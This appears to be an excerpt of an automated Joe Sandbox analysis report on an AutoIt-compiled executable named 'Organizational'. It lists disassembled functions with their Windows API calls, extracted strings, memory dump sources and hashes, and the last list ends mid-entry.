                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: NameUser
                                                          • String ID:
                                                          • API String ID: 2645101109-0
                                                          • Opcode ID: 83d6f132c8dcfe31ec9342942984e55fd64ad55940418f3aba57eed0380d54d8
                                                          • Instruction ID: 2d5f241647d061f10fbd4958969c89a6eee21252ee4f02612d83168b16c44fea
                                                          • Opcode Fuzzy Hash: 83d6f132c8dcfe31ec9342942984e55fd64ad55940418f3aba57eed0380d54d8
                                                          • Instruction Fuzzy Hash: 66C04CF181010DDBCB05DBA0D9C8EEE77BCAB04304F140055A115B2100D7B49B848A71
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0027A35A
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 48327609827183629a1cbdb0466ffaf1fe0a98ebb8995045955031681241030d
                                                          • Instruction ID: e74ed6647e9f0e15f591b0b9ce2762f42f371d615a5788ccc4b9b51eecbafd34
                                                          • Opcode Fuzzy Hash: 48327609827183629a1cbdb0466ffaf1fe0a98ebb8995045955031681241030d
                                                          • Instruction Fuzzy Hash: 74A0243005010CF7CF001F41FC4C4447F5CD7001507404050FC0C04031C773545145C0
                                                          APIs
                                                          • CharUpperBuffW.USER32(?,?,002E0980), ref: 002D3C65
                                                          • IsWindowVisible.USER32(?), ref: 002D3C89
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpperVisibleWindow
                                                          • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                          • API String ID: 4105515805-45149045
                                                          • Opcode ID: f06a69a3add18e9a55681bfaa4ad6d257d3a516e2127d3456bb345b7b9002401
                                                          • Instruction ID: 136f260543752341703e4de6055cf36c0ac58dba0f93b53dc49caf4e59867d8d
                                                          • Opcode Fuzzy Hash: f06a69a3add18e9a55681bfaa4ad6d257d3a516e2127d3456bb345b7b9002401
                                                          • Instruction Fuzzy Hash: 03D18034234305CBCB14EF10C491A6AB7A5EF94354F148959F8465B3E2CB71EE6ACF42
                                                          APIs
                                                          • SetTextColor.GDI32(?,00000000), ref: 002DAC55
                                                          • GetSysColorBrush.USER32(0000000F), ref: 002DAC86
                                                          • GetSysColor.USER32(0000000F), ref: 002DAC92
                                                          • SetBkColor.GDI32(?,000000FF), ref: 002DACAC
                                                          • SelectObject.GDI32(?,?), ref: 002DACBB
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 002DACE6
                                                          • GetSysColor.USER32(00000010), ref: 002DACEE
                                                          • CreateSolidBrush.GDI32(00000000), ref: 002DACF5
                                                          • FrameRect.USER32(?,?,00000000), ref: 002DAD04
                                                          • DeleteObject.GDI32(00000000), ref: 002DAD0B
                                                          • InflateRect.USER32(?,000000FE,000000FE), ref: 002DAD56
                                                          • FillRect.USER32(?,?,?), ref: 002DAD88
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 002DADB3
                                                            • Part of subcall function 002DAF18: GetSysColor.USER32(00000012), ref: 002DAF51
                                                            • Part of subcall function 002DAF18: SetTextColor.GDI32(?,?), ref: 002DAF55
                                                            • Part of subcall function 002DAF18: GetSysColorBrush.USER32(0000000F), ref: 002DAF6B
                                                            • Part of subcall function 002DAF18: GetSysColor.USER32(0000000F), ref: 002DAF76
                                                            • Part of subcall function 002DAF18: GetSysColor.USER32(00000011), ref: 002DAF93
                                                            • Part of subcall function 002DAF18: CreatePen.GDI32(00000000,00000001,00743C00), ref: 002DAFA1
                                                            • Part of subcall function 002DAF18: SelectObject.GDI32(?,00000000), ref: 002DAFB2
                                                            • Part of subcall function 002DAF18: SetBkColor.GDI32(?,00000000), ref: 002DAFBB
                                                            • Part of subcall function 002DAF18: SelectObject.GDI32(?,?), ref: 002DAFC8
                                                            • Part of subcall function 002DAF18: InflateRect.USER32(?,000000FF,000000FF), ref: 002DAFE7
                                                            • Part of subcall function 002DAF18: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002DAFFE
                                                            • Part of subcall function 002DAF18: GetWindowLongW.USER32(00000000,000000F0), ref: 002DB013
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                                                          • String ID:
                                                          • API String ID: 4124339563-0
                                                          • Opcode ID: 901cbe9a3e474a2ad376b039d32c605dafa1bff7d0ae9fa5978f8839718f1170
                                                          • Instruction ID: f618423b057c74de4fce065b0134b33ccae150f9d6b0343e1aaf756bd17138ac
                                                          • Opcode Fuzzy Hash: 901cbe9a3e474a2ad376b039d32c605dafa1bff7d0ae9fa5978f8839718f1170
                                                          • Instruction Fuzzy Hash: A7A1C471058341AFD7119F64EC8CE6B7BA9FF88321F100A1AF5569A2E0C7B4D885CF52
                                                          APIs
                                                          • DestroyWindow.USER32(?,?,?), ref: 00253072
                                                          • DeleteObject.GDI32(00000000), ref: 002530B8
                                                          • DeleteObject.GDI32(00000000), ref: 002530C3
                                                          • DestroyIcon.USER32(00000000,?,?,?), ref: 002530CE
                                                          • DestroyWindow.USER32(00000000,?,?,?), ref: 002530D9
                                                          • SendMessageW.USER32(?,00001308,?,00000000), ref: 0028C77C
                                                          • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0028C7B5
                                                          • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0028CBDE
                                                            • Part of subcall function 00251F1D: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00252412,?,00000000,?,?,?,?,00251AA7,00000000,?), ref: 00251F76
                                                          • SendMessageW.USER32(?,00001053), ref: 0028CC1B
                                                          • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0028CC32
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0028CC48
                                                          • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0028CC53
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                          • String ID: 0
                                                          • API String ID: 464785882-4108050209
                                                          • Opcode ID: 9456c7f34e609ba0e1cca1c4ecf6bdf8ed65bcd632e57ddcbba303b7a86a11a6
                                                          • Instruction ID: 43646fbf71f242f4f27bc9648a7ee45dc75f0eed4fb67c648518e1c2cb6f9df5
                                                          • Opcode Fuzzy Hash: 9456c7f34e609ba0e1cca1c4ecf6bdf8ed65bcd632e57ddcbba303b7a86a11a6
                                                          • Instruction Fuzzy Hash: 8E12C234525202DFDB25EF24C888BA9B7A5FF04311F244569F845CB292C771ED66CFA1
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                                          • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                          • API String ID: 2660009612-1645009161
                                                          • Opcode ID: be7ab12f0e764a94e35ef29daae0b43e20afb143503121a6a25a1f43b9435c76
                                                          • Instruction ID: 51e66fc8755fe768f56f80146ba0bb2501a49a191c664b50d6e4a05b05a39498
                                                          • Opcode Fuzzy Hash: be7ab12f0e764a94e35ef29daae0b43e20afb143503121a6a25a1f43b9435c76
                                                          • Instruction Fuzzy Hash: E4A1A430A6020AFBCF10EF61CD52EAE7778AF45740F144029F905AB292DB719EB5DB60
                                                          APIs
                                                          • DestroyWindow.USER32(00000000), ref: 002C7BC8
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 002C7C87
                                                          • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 002C7CC5
                                                          • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 002C7CD7
                                                          • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 002C7D1D
                                                          • GetClientRect.USER32(00000000,?), ref: 002C7D29
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 002C7D6D
                                                          • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 002C7D7C
                                                          • GetStockObject.GDI32(00000011), ref: 002C7D8C
                                                          • SelectObject.GDI32(00000000,00000000), ref: 002C7D90
                                                          • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 002C7DA0
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 002C7DA9
                                                          • DeleteDC.GDI32(00000000), ref: 002C7DB2
                                                          • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 002C7DDE
                                                          • SendMessageW.USER32(00000030,00000000,00000001), ref: 002C7DF5
                                                          • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 002C7E30
                                                          • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 002C7E44
                                                          • SendMessageW.USER32(00000404,00000001,00000000), ref: 002C7E55
                                                          • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 002C7E85
                                                          • GetStockObject.GDI32(00000011), ref: 002C7E90
                                                          • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 002C7E9B
                                                          • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 002C7EA5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                          • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                          • API String ID: 2910397461-517079104
                                                          • Opcode ID: 4fb09a6d4e1b56ebf1f66e0f0a44ff9b9be0ab695c2541c9b269eebe67cd3f1a
                                                          • Instruction ID: df99d7c9abfea25635aa9de479c5310a50af24b2a3484a9817206fc259b2bef5
                                                          • Opcode Fuzzy Hash: 4fb09a6d4e1b56ebf1f66e0f0a44ff9b9be0ab695c2541c9b269eebe67cd3f1a
                                                          • Instruction Fuzzy Hash: 62A16271650215AFEB149BA4DC8AFAE777DEB08710F048514FA14AB2E0C6B0AD52CF64
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 002BB361
                                                          • GetDriveTypeW.KERNEL32(?,002E2C4C,?,\\.\,002E0980), ref: 002BB43E
                                                          • SetErrorMode.KERNEL32(00000000,002E2C4C,?,\\.\,002E0980), ref: 002BB59C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DriveType
                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                          • API String ID: 2907320926-4222207086
                                                          • Opcode ID: 78fcc13f0e3ce977202002efa81f28248fe17882cf6d333a0115ea847226470b
                                                          • Instruction ID: 25ed28e0a4a48197102e24bc99779888f6b00770991d72f8303bc16bdc4424bc
                                                          • Opcode Fuzzy Hash: 78fcc13f0e3ce977202002efa81f28248fe17882cf6d333a0115ea847226470b
                                                          • Instruction Fuzzy Hash: B4518530B71209DFCB22DF21C9929FDB7B0AF457807644015E406A76D1D7F1AEA1CB66
                                                          APIs
                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 002DA0F7
                                                          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 002DA1B0
                                                          • SendMessageW.USER32(?,00001102,00000002,?), ref: 002DA1CC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Window
                                                          • String ID: 0
                                                          • API String ID: 2326795674-4108050209
                                                          • Opcode ID: 84031d3c67488390d9818d064441f8ca08777195163a6d940e2b8cdda6e9a09f
                                                          • Instruction ID: 610c0fd6f91d0d306a80ffa02b834cbea3f51d282cf388f6899812210c19afef
                                                          • Opcode Fuzzy Hash: 84031d3c67488390d9818d064441f8ca08777195163a6d940e2b8cdda6e9a09f
                                                          • Instruction Fuzzy Hash: 6E02E030128242AFDB15CF18D888FAABBE5FF49314F08851AF995963A0C7B4DD65CF52
                                                          APIs
                                                          • GetSysColor.USER32(00000012), ref: 002DAF51
                                                          • SetTextColor.GDI32(?,?), ref: 002DAF55
                                                          • GetSysColorBrush.USER32(0000000F), ref: 002DAF6B
                                                          • GetSysColor.USER32(0000000F), ref: 002DAF76
                                                          • CreateSolidBrush.GDI32(?), ref: 002DAF7B
                                                          • GetSysColor.USER32(00000011), ref: 002DAF93
                                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 002DAFA1
                                                          • SelectObject.GDI32(?,00000000), ref: 002DAFB2
                                                          • SetBkColor.GDI32(?,00000000), ref: 002DAFBB
                                                          • SelectObject.GDI32(?,?), ref: 002DAFC8
                                                          • InflateRect.USER32(?,000000FF,000000FF), ref: 002DAFE7
                                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 002DAFFE
                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 002DB013
                                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 002DB05F
                                                          • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 002DB086
                                                          • InflateRect.USER32(?,000000FD,000000FD), ref: 002DB0A4
                                                          • DrawFocusRect.USER32(?,?), ref: 002DB0AF
                                                          • GetSysColor.USER32(00000011), ref: 002DB0BD
                                                          • SetTextColor.GDI32(?,00000000), ref: 002DB0C5
                                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 002DB0D9
                                                          • SelectObject.GDI32(?,002DAC1F), ref: 002DB0F0
                                                          • DeleteObject.GDI32(?), ref: 002DB0FB
                                                          • SelectObject.GDI32(?,?), ref: 002DB101
                                                          • DeleteObject.GDI32(?), ref: 002DB106
                                                          • SetTextColor.GDI32(?,?), ref: 002DB10C
                                                          • SetBkColor.GDI32(?,?), ref: 002DB116
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                          • String ID:
                                                          • API String ID: 1996641542-0
                                                          • Opcode ID: b9eb1ef466184be5c7e65d9b7b2c5f1cc6bc385bc2bdb8c5bcabb88024f6e46a
                                                          • Instruction ID: 6dc4f45935606c1b53eeb743dd4ca7e6494e51777f10ca600e737a517f56e996
                                                          • Opcode Fuzzy Hash: b9eb1ef466184be5c7e65d9b7b2c5f1cc6bc385bc2bdb8c5bcabb88024f6e46a
                                                          • Instruction Fuzzy Hash: 9F616B71940218AFDB119FA4EC88EAE7B79FF08320F114116F919AF2A1D7B59D91CF90
                                                          APIs
                                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 002D90EA
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002D90FB
                                                          • CharNextW.USER32(0000014E), ref: 002D912A
                                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 002D916B
                                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 002D9181
                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 002D9192
                                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 002D91AF
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 002D91FB
                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 002D9211
                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 002D9242
                                                          • _memset.LIBCMT ref: 002D9267
                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 002D92B0
                                                          • _memset.LIBCMT ref: 002D930F
                                                          • SendMessageW.USER32(?,00001053,000000FF,?), ref: 002D9339
                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 002D9391
                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 002D943E
                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 002D9460
                                                          • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002D94AA
                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 002D94D7
                                                          • DrawMenuBar.USER32(?), ref: 002D94E6
                                                          • SetWindowTextW.USER32(?,0000014E), ref: 002D950E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                          • String ID: 0
                                                          • API String ID: 1073566785-4108050209
                                                          • Opcode ID: b88c0c84fdf716b0b22b3aa679f91256bb7eb703bbab12be1809faf8fdc28ae4
                                                          • Instruction ID: 96a99351422477aab77415fd0f421b4befbf39f4f64859acb38b26d57e92568c
                                                          • Opcode Fuzzy Hash: b88c0c84fdf716b0b22b3aa679f91256bb7eb703bbab12be1809faf8fdc28ae4
                                                          • Instruction Fuzzy Hash: 05E19070910209AFDF219F94DC88EEE7BB8EF09710F108156F919AA291D7708EE1DF61
                                                          APIs
                                                          • GetCursorPos.USER32(?), ref: 002D5007
                                                          • GetDesktopWindow.USER32 ref: 002D501C
                                                          • GetWindowRect.USER32(00000000), ref: 002D5023
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 002D5085
                                                          • DestroyWindow.USER32(?), ref: 002D50B1
                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 002D50DA
                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 002D50F8
                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 002D511E
                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 002D5133
                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 002D5146
                                                          • IsWindowVisible.USER32(?), ref: 002D5166
                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 002D5181
                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 002D5195
                                                          • GetWindowRect.USER32(?,?), ref: 002D51AD
                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 002D51D3
                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 002D51ED
                                                          • CopyRect.USER32(?,?), ref: 002D5204
                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 002D526F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                          • String ID: ($0$tooltips_class32
                                                          • API String ID: 698492251-4156429822
                                                          • Opcode ID: 1058c222ea56b66abcf4411fdef996eb6329e0e64a38e71c8d9c18f5e998a528
                                                          • Instruction ID: 35060a1e61bfea7324b13ca2f517737076176bca8a9fc78eee3b880d3354fa0f
                                                          • Opcode Fuzzy Hash: 1058c222ea56b66abcf4411fdef996eb6329e0e64a38e71c8d9c18f5e998a528
                                                          • Instruction Fuzzy Hash: E3B1BC70624751AFD704DF64D888B6ABBE4BF88300F00891DF8999B291D7B0EC59CF95
                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 002B499C
                                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 002B49C2
                                                          • _wcscpy.LIBCMT ref: 002B49F0
                                                          • _wcscmp.LIBCMT ref: 002B49FB
                                                          • _wcscat.LIBCMT ref: 002B4A11
                                                          • _wcsstr.LIBCMT ref: 002B4A1C
                                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 002B4A38
                                                          • _wcscat.LIBCMT ref: 002B4A81
